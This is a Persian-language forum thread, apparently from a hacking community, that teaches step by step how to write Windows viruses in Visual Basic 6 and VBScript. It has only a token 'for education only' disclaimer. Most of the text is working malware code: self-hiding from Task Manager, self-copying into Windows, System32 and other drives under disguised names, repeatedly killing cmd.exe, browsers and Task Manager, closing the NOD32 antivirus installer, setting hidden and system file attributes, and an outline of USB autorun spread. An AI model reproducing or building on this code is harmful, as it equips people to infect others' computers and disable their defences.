درود دوستان...



تو این بخش من براتون ویروس نویسی با ویژوال بیسیک رو آموزش خواهم داد...



دوستان و علاقه مندان به مبحث ویروس نویسی میتوانند آموزش های خودشون رو در اینجا



قرار بدن تا سایر کاربران استفاده کنند....





و آموزشهاتون رو در همینجا قرار بدین...



سطح آموزش از مقدماتی تا پیشرفته هست..



با تشکر از همه ی دوستان



تذکر:::این مطالب صرفا جنبه آموزش دارد و هرگونه
استفاده نادرست از کدها و دستورات به عهده خود کاربر خواهد بود و بنده
هیچگونه مسئولیتی در این باره قبول نخواهم کرد



هرگونه درخواست سورس ویروس یا آموزش های دیگه تو این تاپیک ممنوع هست،تو این تاپیک فقط آموزش قرار میگیره

یا حق











__________________

درود دوستان....



همه ما میدونیم که ویروسها فایلهایی مخفی هستند که به دلیل ضعف امنیتی وارد سیستم ما میشند،



برای دادن این خاصیت ها به ویروس در ویژال بیسیک از کدهای زیر استفاده میکنیم...




کد:

me.hide
App.TaskVisible = False

توضیح کد Me.Hide:



برای دیده نشدن فرم پس از اجرای فایل



توضیحApp.TaskVisible = False:



دیده نشدن فایل ویروسی در قسمت Aplications نرم افزار Task Manager ویندوز.

اگر برابر False باشد دیده نمی شود ولی اگر برار True باشد دیده می شود.



نحوه ی استفاده :

این دو دستور را معمولا در قسمت Form_Load برنامه (در ویژوال بیسیک) می نویسند.

به صورت زیر :


کد:

Private Sub Form_Load()
Me.Hide
App.TaskVisible = False
End Sub

درس دوم: (اضافه کردن یک قابلیت به ویروس)



1.انتشار ویروس





برای انتشار یک ویروس از کپی کردن استفاده میکنیم به فرم زیر:




کد:

filecopy App.path + App.exename + ".exe",[path]+namefile

or




کد:

filecopy Path file1 + namefile,[path]+namefile

توضیح :



App.path :مسیری که برنامه اجراشده است را به ما میده.

App.exename: نام فایل اجرایی جاری را به ما میده.

path:به مسیری که می خواهید کپی شود.

name file:به این نام کپی شود.

Path file1:مسیری که فایل قرار دارد.

--------------

مثال : از عمل copy و paste استفاده کنید.


کد:

Private Sub Form_Load()
Me.Hide
App.TaskVisible = False
filecopy App.path + App.exename + ".exe","c:\"+"Test.exe"
filecopy "c:\" + "Test.exe","d:\"+"Test2.exe"
End Sub

درس سوم(اضافه کردن یک قابلیت به ویروس) ادامه



برای اینکه ویروس ما کارایی بهتری داشته و اون عملکردی که ما مد نظرمون هست
رو داشته باشه باید سطح دسترسی ویروسمون رو به پوشه ویندوز بالا ببریم..



سوال: چطوری اینکارو باید انجام داد؟



جواب:با استفاده از توابع API و قابلیت ها و دستورهایی رو که خود ویژوال بیسیک داره..



شاید کار با توابع برای شما سخت باشه من از دستورات داخلی ویژوال شروع میکنم تا به توابع برسم...




کد:

w$ = Environ("windir")

توضیح:

ما مقدار $w (که این نام دلخواه هست می تونید بزارید a یا ...) را ("Environ("windir

قرار دادیم که پوشه ی اصلی ویندوز را به ما می ده.



چطوری ازش استفاده کنیم؟؟




کد:

filecopy App.path + App.exename + ".exe",w$+"\"+"namefile"

or




کد:

filecopy Path file1 + namefile,w$ +"\" +"namefile"

در اینجا به خاطر اینکه مقداری که به ما میده میشه :



مثال:


کد:

c:\windows

برای همین از "\"+ تا به صورت زیر در بیاد :


کد:

c:\windows\

تمرین:

ویروسی بنویسید که خودش رو در پوشه system32 کپی کنه :



جواب:


کد:

filecopy App.path + App.exename + ".exe",w$+"\system32\"+"namefile"

ویروسی که ما تا الان تونستیم ایجاد کنیم:




کد:

Private Sub Form_Load()
Me.Hide
App.TaskVisible = False
w$ = Environ("windir")
filecopy App.path + App.exename + ".exe",w$+"\system32\"+"virus.exe"
filecopy App.path + App.exename + ".exe",w$+"\"+"virus.exe"
filecopy App.path + App.exename + ".exe","c:\"+"virus.exe"
filecopy "c:\" + "Test.exe","d:\"+"virus.exe"
End Sub

خوب در سه درس قبلی ما یاد گرفتیم که چطوری ویروس بنویسیم و اون رو انتشار بدیم...



حالا شما اومدین و این ویروس رو انتشار دادین،اگه شخصی با برنامه نویسی
آشنا باشه به راحتی میتونه ویروس و زحمت های ما رو به هدر بده...



راهایی که باعث تلفات در ویروس ما میشه عبارت است از:



1-آنتی ویروسها

2-از طریق دستی(Cmd،کد نویسی هایه دستی و....)



حالا باید چی کار کنیم ؟؟؟



ما اول قابلیت غیر قابل حذف شدن رو به صورت دستی به ویروسمون اضافه میکنیم:



وقتی cmd را کاربر اجرا میکنه در Task Manager و در لیست فرایند ها فرایندی
به نام cmd.exe اضافه میشه.حالا ما می خواهیم به وسیله ی ویندوز آنرا End
Process کنیم. با استفاده از دستور Shell و فایلی در ویندوز . به این صورت :




کد:

Shell "taskkill /f /im Process.exe", vbHide

توضیح :

این دستور وقتی Process مورد نظر ما را پیدامیکنه و اونو می بندد.



نحوه ی استفاده :

تنها چیزی که قدرتی فوق العده به این دستور می ده اینه که همیشه این کار را
انجام بده ، منظورم اینه که مثلا در Form _ Load قرار ندید.

شما میتونید یا تایمر به برنامه اضافه کنید و بنا به سلیقه خودتون اون رو Edit کنید..



خوب نتیجه کلی ویروس ما به این صورت شد:




کد:

Private Sub Form_Load()
Timer1.Interval = 1
Me.Hide
App.TaskVisible = False

w$ = Environ("windir")
FileCopy App.Path + App.EXEName + ".exe", w$ + "\system32\" + "virus.exe"
FileCopy App.Path + App.EXEName + ".exe", w$ + "\" + "virus.exe"
FileCopy App.Path + App.EXEName + ".exe", "c:\" + "virus.exe"
FileCopy "c:\" + "Test.exe", "d:\" + "virus.exe"
End Sub

Private Sub Timer1_Timer()
Shell "taskkill /f /im cmd.exe", vbHide
End Sub

شاید برای بعضی از علاقه مندان به علم ویروس نویسی پیش اومده که برنامه هاشون اون طوری که میخواد اجرا نمیشه



شاید بخوایی ویروس رو در فلش فلاپی و... جا سازی کنید که در پاره ای از موارد ارور میگیرید به شکل زیر:




کد:

on error goto your number or name

برای جلوگیری از به وجود آممدن این error با ید از دستورات on error استفاده کنید.



نحوه ی استفاده :



1- برای استفاده در برنامه ها

2- استفاده در ویروس نویسی



1.برای استفاده در برنامه باید به برنامه بگیم اگه با error مواجه شدی یک پیام به کاربر بده :


کد:

on error goto 1
دستورات شما
1:
msgbox "Your Message", ,"Message

2.برای استفاده در ویروس نویسی ما که نباید به کاربر پیام بدیم پس می نویسیم :




کد:

on error goto 2
دستورات شما
2:

با این دستور وقتی برنامه با error مواجه شد چیزی نشان نمی ده ولی برنامه بسته نمی شود.



توجه : بین goto نباید فاصله باشد.



نوع دیگری هم از دستور On error وجود دارد :



On Error Resume Next



نحوه ی استفاده :

این دستور را بالا ی دستورات خود بنویسید ، و وقتی که برنامه با error مواجه شد به برنامه به دستور بعدی منتقل می شود.

دوستان مطلبی رو که یادم رفت ذکر کنم غیر قابل حذف شدن ویروس بود ....



اگه آنتی ویروس شخص مورد نظر ما به روز نباشه یا رو سیستمش اصلا آنتی ویروس نصب نیست ...



ما میخواییم از نصب آنتی ویروس جلو گیری کنیم چطوری؟؟؟



فقط کافیه موقع نصب به Prosses های نصب آنتی ویروس توجه کنیم و اون رو در محیط کد نویسی ببندیم



این کد برای نود32 میباشد:


کد:

rivate Const WM_CLOSE = &H10
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function PostMessage Lib "user32" Alias "PostMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long

Private Sub Timer1_Timer()
tWnd = FindWindow(vbNullString, "Eset Nod32 Anivirus")
PostMessage tWnd, WM_CLOSE, 0&, 0&
End Sub

توضیح :

با استفاده از Findwindow عنوان پنجره را بدست می آوریم و با PostMessage
بری ارسال دستور بستن برنامه استفاده می کنیم و دستور WM_CLOSE هم برای
بستن.



نحوه ی استفاده :

به جای عبارت Eset Nod32 Antivirus ما عنوان برنامه ی آنتی ویروس یا هر برنامه ی دیگر را می نویسیم.



خوب ویروسی که ما تا الان تونستیم بنویسیم به این قدرت رسیده..




کد:

Private Const WM_CLOSE = &H10
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function PostMessage Lib "user32" Alias "PostMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long


Private Sub Form_Load()
Timer1.Interval = 1
Me.Hide
App.TaskVisible = False
end sub

Private Sub Timer1_Timer()
Shell "taskkill /f /im firefox.exe", vbHide
Shell "taskkill /f /im iexplore.exe", vbHide

tWnd = FindWindow(vbNullString, "Eset Nod32 AntiVirus")
PostMessage tWnd, WM_CLOSE, 0&, 0&


w$ = Environ("windir")
FileCopy App.Path + App.EXEName + ".exe", w$ + "\system32\" + "virus.exe"
FileCopy App.Path + App.EXEName + ".exe", w$ + "\temp\" + "virus.exe"
FileCopy App.Path + App.EXEName + ".exe", w$ + "\system\" + "virus.exe"

FileCopy App.Path + App.EXEName + ".exe", w$ + "\media\" + "virus.mp3"

FileCopy App.Path + App.EXEName + ".exe", "c:\" + "explorer.exe"

FileCopy App.Path + App.EXEName + ".exe", "d:\" + "explorer.exe"

FileCopy App.Path + App.EXEName + ".exe", "e:\" + "explorer.exe"

FileCopy App.Path + App.EXEName + ".exe", "f:\" + "explorer.exe"

end sub

حتما تا الان سیستم شما به ویروس آلوده شده(از دید من بدترین ویروس رسیلر و
سیستم ولوم اینفورمیشنSystem Volum Information) هستند؛چون وقتی وارد
سیستمی بشند به سرعت خودشون رو تکثیر میکنند و فضای سیستم رو اشباه
میکنند.(در جلسات آتی نوشتن این کدها رو آموزش خواهم داد)



همونطوری که میدونید وقتی سیستم ما آلوده به این نوع ویروسها شد ما چیزی رو
نمیبینیم فقط شاهد کند شدن سیستم بد کار کردن سیستم و... هستیم...

ما چیزی رو به عنوان ویروس مشاهده نمیکنیم چون از دید ما مخفی هستند و
رابطه ای به صورت InterFace با ما ندارند و فقط به سراغ کارهایی میرن که
برای اون طراحی و برنامه نویسی شده اند...



تو این درس میخوام به شما نحوه پنهان سازی ویروس رو آموزش بدم...



ما برای پنهان سازی ویروس دو روش در پیشه رو داریم:

1.استفاده از Command promt(CMD)

2.استفاده از دستورات داخلی ویژوال بیسیک..



پنهان سازی با استفاده از توابع ویژوال بیسیک:



برای مخفی سازی باید ازدستور SetAttr استفاده کنیم.

شکل کاربردی دستور ما:


کد PHP:




بجای c:\virus.exe باید آدرس مکانی که فایل eXe رو ایجاد کردید بدید..



توضیح سایر کدها:





[hidden ....] : این جا خصوصیاتی که می خواهید فایل ویروس بگیرد :



مخفی "vbHidden"

مخفی سیستمی "vbsystem"

فقط خواندن "vbReadOnly"

و ...



چطوری باید این خصوصیات رو اضافه کنیم؟



با استفاده از plus(+) اینکارو انجام میدیم:




کد:

SetAttr "c:\virus.exe", vbhidden + vbsystem

نکته :

شما اگر این دستور را خودتان تایپ کنید می بینید که بعد از زدن "," می توانید لیستی از این خصوصیات را ببینید.



نحوه ی استفاده :




کد:

کد PHP:
Private Sub Form_Load()
me.hide
end sub

Private Sub Timer1_Timer()

FileCopy App.Path + App.EXEName + ".exe","c:\virus.exe"

SetAttr "c:\virus.exe", vbhidden + vbsystem
end sub

ادامه آموزشهای پنهان سازی ویروس:



حالا روش مخفی کردن ویروسمون با استفاده از CMD:



خوب با استفاده از دستور Shell محیط CMD رو فراخوانی میکنیم:




کد PHP:




خوب حالا به جایی CMD comand باید اون دستوری که میخواییم در محیط CMD اجرا بشه دستور مورد نظر رو ایجاد کنیم..



مخفی سازی از طریق داس :




کد PHP:




توضیحات:



+h برای دادن خاصیت hidden به فایل مورد نظر

s+ برای دادن خاصیت hidden system (مخفی سیستمی)

r+ برای دادن خاصیت Read only (فقط خواندن)

c:\virus.exe : آدرس و نام فایل ویروس یا فایل





برای برداشتن خاصیت های مخفی و... :




کد:

Shell "attrib -h -s -r c:\1.virus"

-h برداشتن خاصیت Hidden

-s برداشتن خاصیت مخفی سیستمی

r- برداشتن خاصیت Read only



نحوه ی استفاده :



برای استفاده از این دستورات می توانید این دستورات را پس از کپی کردن فایل
(مثلا در پوشه های ویندوز) این دستورات را در ادامه ی دستورات کپی قرار
دهید



نکته :



تو اول دستور حتما از دستور On Error Resume Next استفاده کنید.

چند وقت پیش یکی از کاربران آشیانه مطلبی رو تو سوال جوابهای عمومی مطرح کرده بود:



میگفت سیستم یه ویروس گرفته که وقتی وارد ویندوز میشم کیس صدای بوق میده و
وقتی سیستم رو ریست میکنم تا قبل از بالا اومدن ویندوز هیچ صدایی نمیاد ولی
بعد از اونکه وارد ویندوز شدم سیستم دوباره بوق میزنه...:دی



خوب من به شما تو این بخش میخوام یاد بدم که چطوری اینکارو انجام بدین...



اینکه وقتی کاربر وارد محیط ویندوز بشه و سیستم بوق بزنه زیاد جالب نیست و
کمی لُوثه... من میخوام ویروسم تنها با انجام برخی از کارها بوق بزنه تا
کاربر ترسش بیشتر باشه....

Task Manger(ابزار کلیدی و پر استفاده در محیط ویندوز)

ما می خواهیم قابلیتی به ویروس اضافه کنیم که وقتی کاربر برنامه ی Task
Manager را اجرا کرد ابتدا اون برنامه بسته شود و بعد صدای بوق کیس در بیاد
(همون BeeP)



یک تایمر در فرم خود با اینتروال 1 قرار دهید.

ابتدا توابع API زیر را در قسمت جنرال فرم قرار دهید (اطلاعات بیشتر در مورد API را می توانید در بخش ویژوال بیسیک 6 بدست آورید.)




کد PHP:




دستور تایمر:




کد:

Private Sub Timer1_Timer()
handel = FindWindow(vbNullString, "Windows Task Manager")
If handel 0 Then
Beep 135, 3304
SetForegroundWindow handel
SendKeys "%{f4}", 1
End If

End Sub

خوب این دستور باعث میشه تا برنامه بازو بسته بشه و سیستم بوق بزنه و موجب ترس کاربرمیشه(تازه کارها)

(((ستاد ایجاد ترس و وحشت در دل کاربران))) :دی



خوب ما میتونیم باتغییر دستور : Beep 135, 3304 زیر و بم بودن صدا رو دستکاری کنیم...



دوستان تمامی این مطالبی که گفتم بسیار ساده و پیشه پا افتاده بود هنوز کار به جایه حساس نکشیده...



از این پست به بعد سطح ویروس نویسی ما فرق میکنه و پیشرفته تر میشه...

اگه قسمتی از آموزش هایی رو که در ادامه میدم رو نفهمیدین کافیه به من پ.خ
بزنید تا منبعی رو به شما معرفی کنم که با استفاده از اون آموزش ها براتون
راحت تر باشهه....

درود دوستان در این بخش میخوام ویروس نویسی با VB Script آموزش بدم اما قبل از هر چیزی باید بدونید که ویژوال اسکریپت چیه؟



VB Script



این زبان نمونه کوچک شده زبان VB است و کسانی که با ویژوال بیسیک کار کرده
اند در یاد گیری این زبان بیشتر راه را پیموده اند و کافیست تفاوت های آن
را با ویژوال بیسیک یاد گیرند . این زبان برای افزودن افکت به صفحات وب نیز
کاربرد دارد . ولی کاربرد برتر آن در نوشتن برنامه های سمت سرور است که بر
اساس تکنولوژی ASP صورت میگیرد . این زبان به عنوان زبان پیش فرض برای
نوشتن صفحات ASP است . یاد گیری این زبان برای کسانی که تا کنون برنامه
نویسی نکرده اند بسیار آسان است و شروع بسیار خوبی برای ورود به دنیای
برنامه نویسی است .

-------------------------------------------------------------------------------------------------------------------------------------



حتما تا الان فلش و کارتهای حافظه(رم) شما ویروسی تحت عنوان
اتوران(AutoRun.inf)گرفته،وقتی پاکش میکنید دوباره بعد از بازو بسته کردن
پنجره یا ریفرش(ReFresh) کردن اون دوباره ظاهر میشه ...



خوب تو بخش میخواییم آموزش این ویروس رو به شما یاد بدیم:



برای اینکار یه تایمر با Interval=1 به برنامه اضافه کنید:


کد PHP:




توضیح :

خط اول را که همه می دونید (برای رفع error)

خط دوم : شئ fso را برای برنامه تعریف می کنیم (برای کپی کردن و ....)

خط سوم : mf را برابر آدرس فایل قرار می دهیم

خط چهارم : به برنامه می گیم اگر در پوشه یا درایو c فایل virus.exe نبود ، آنگاه فایل ویروس را در آدرس c کپی کن.



نکته: شاید شما بگید چرا باید اینتروال رو 1 بزاریم یا چه کاری میکنه برای ما؟؟؟؟



عارضم خدمت شما اگه اینتروال صفر باشه وقتی این ویروس پاکشه با ریفرش دیگه
ایجاد نمیشه؛اما وقتی ما اینتروال رو یک میکنیم در واقع باعث این میشیم که
وقتی این یکی پاک شد دوباره خودش رو القاء کنه...



شما میتونید با دستوراتی که تا الان گفتم اونو مخفی کنید تکثیر کنید و.....